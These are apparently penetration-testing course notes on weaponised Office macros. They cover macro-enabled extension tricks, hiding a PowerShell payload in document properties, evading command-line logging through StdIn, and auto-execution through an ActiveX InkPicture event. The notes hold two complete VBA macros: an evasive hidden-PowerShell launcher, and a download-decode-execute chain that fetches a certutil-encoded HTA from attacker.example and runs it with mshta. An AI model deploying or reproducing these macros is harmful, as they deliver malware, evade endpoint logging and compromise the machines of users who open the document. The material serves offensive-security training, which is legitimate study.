PTX Course

Macro

OfficeOpenXML

OfficeOpenXML Standard file extensions:

  • Macros not permitted:

    • DOCX

    • DOTX [Template]

  • Macros permitted:

    • DOCM

    • DOTM [Template]

Word decides how to parse a file by sniffing its contents, not by its extension. A DOCM (or any other macro-enabled format) can therefore be renamed to an extension that does not support macros by design, such as RTF or DOC, and Word still loads it as a macro-enabled OOXML document and runs its macros. The exception is DOCX: Word checks that extension explicitly and refuses to run VBA from a file named .docx.

rem List the extensions associated with Office programs (cmd.exe); any extension handled by Word, Excel or PowerPoint is a candidate for delivering a renamed macro-enabled file. "ftype <ProgID>" shows the program behind a ProgID.
assoc | findstr /i "word"
assoc | findstr /i "excel"
assoc | findstr /i "powerp"

Macro leveraging file properties to hide its payload and StdIn to avoid command-line logging

AutoOpen (and Document_Open) is flagged by some AVs, so a less obvious trigger should be used for macro execution, such as a button the user clicks.

The PowerShell payload is stored in the document's properties, for example in "Author", and read back at run time with BuiltInDocumentProperties, so the macro body itself contains no PowerShell text.

Hide the PowerShell command's arguments from command-line logging (event 4688, Sysmon event 1) by starting powershell.exe with a static argument list and passing the script through StdIn.WriteLine; only the static launch line is recorded.

The payload can also be hidden, in encoded form, in a custom Excel form (for example in a control's caption or tag).

Macro Code: Link

Including unused code is a simple obfuscation tactic: in the linked example the variable c is assigned but never used anywhere in the macro.

Leveraging ActiveX Controls for automatic macro execution

....
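The following is an added example written for these notes, not the course's linked macro. It puts together the points above: the payload is read from the Author property, fed to powershell.exe over StdIn, a decoy variable c is never used, and the macro is triggered from an ActiveX control instead of AutoOpen. It assumes the PowerShell one-liner was typed into File > Info > Properties > Author, that the code lives in ThisDocument, and that the document contains an ActiveX CommandButton named CommandButton1 (manual trigger) and/or a Microsoft InkPicture control named InkPicture1, whose Painted event fires when the control is drawn as the document opens (one ActiveX-based auto-execution trigger; the control names are assumptions).

```vba
' Added example for these notes (ThisDocument module). Assumes the PowerShell
' payload is in the Author property and that the controls below exist.

' Manual trigger: no AutoOpen/Document_Open anywhere in the project.
Private Sub CommandButton1_Click()
    RunFromAuthor
End Sub

' Automatic trigger: an ActiveX control event instead of AutoOpen.
' Painted fires on every repaint, so guard against running more than once.
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    Static fired As Boolean
    If fired Then Exit Sub
    fired = True
    RunFromAuthor
End Sub

Sub RunFromAuthor()
    Dim sh As Object, p As Object
    Dim payload As String
    Dim c As String

    ' Decoy: assigned but never used (the unused-variable obfuscation).
    c = "Q3-budget-review"

    ' The PowerShell text is in the Author property, not in this module,
    ' so a scanner reading vbaProject.bin sees no PowerShell.
    payload = ActiveDocument.BuiltInDocumentProperties("Author").Value

    Set sh = CreateObject("WScript.Shell")
    ' "-Command -" makes powershell.exe read its script from StdIn. Process
    ' creation logging (4688 / Sysmon event 1) records only this static line.
    Set p = sh.Exec("powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command -")
    p.StdIn.WriteLine payload
    p.StdIn.Close   ' EOF tells PowerShell the script is complete
End Sub
```

WScript.Shell.Exec always creates the child with a console; -WindowStyle Hidden only hides it after PowerShell starts, so a console window flashes briefly. Script-block logging (event 4104) still captures the script body once PowerShell runs it; the StdIn trick hides it from command-line logging only.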

Download and Run from Disk

Download a file that was wrapped with certutil -encode on the attacker side (a .crt that looks like a PEM certificate: base64 between BEGIN/END CERTIFICATE lines), decode it back with certutil -decode to an HTA, and execute it with mshta.exe.
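The following is an added example macro for these notes, not code from the course. It downloads the .crt with WinHTTP, writes it to %TEMP% with ADODB.Stream, decodes it with certutil and runs the resulting HTA with mshta.exe. The URL and file names are placeholders, and the file is assumed to have been produced with "certutil -encode payload.hta payload.crt".

```vba
' Added example for these notes. URL and file names are placeholders.
Sub DownloadDecodeRun()
    Dim url As String, crtPath As String, htaPath As String
    Dim http As Object, stream As Object, sh As Object

    url = "http://attacker.example/payload.crt"        ' placeholder
    crtPath = Environ("TEMP") & "\update.crt"
    htaPath = Environ("TEMP") & "\update.hta"

    ' Fetch the certutil-encoded blob (synchronous GET).
    Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
    http.Open "GET", url, False
    http.Send
    If http.Status <> 200 Then Exit Sub

    ' Write the raw response bytes to disk (Type 1 = adTypeBinary,
    ' SaveToFile option 2 = adSaveCreateOverWrite).
    Set stream = CreateObject("ADODB.Stream")
    stream.Type = 1
    stream.Open
    stream.Write http.ResponseBody
    stream.SaveToFile crtPath, 2
    stream.Close

    Set sh = CreateObject("WScript.Shell")
    ' certutil -decode strips the BEGIN/END CERTIFICATE lines and base64-decodes
    ' the body; window style 0 = hidden, True = wait for it to finish.
    sh.Run "certutil -decode """ & crtPath & """ """ & htaPath & """", 0, True
    ' Run the decoded HTA without waiting.
    sh.Run "mshta.exe """ & htaPath & """", 0, False
End Sub
```

certutil can also do the download itself ("certutil -urlcache -split -f <url> <file>"), which removes the WinHTTP/ADODB code at the cost of a second, widely signatured certutil invocation.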
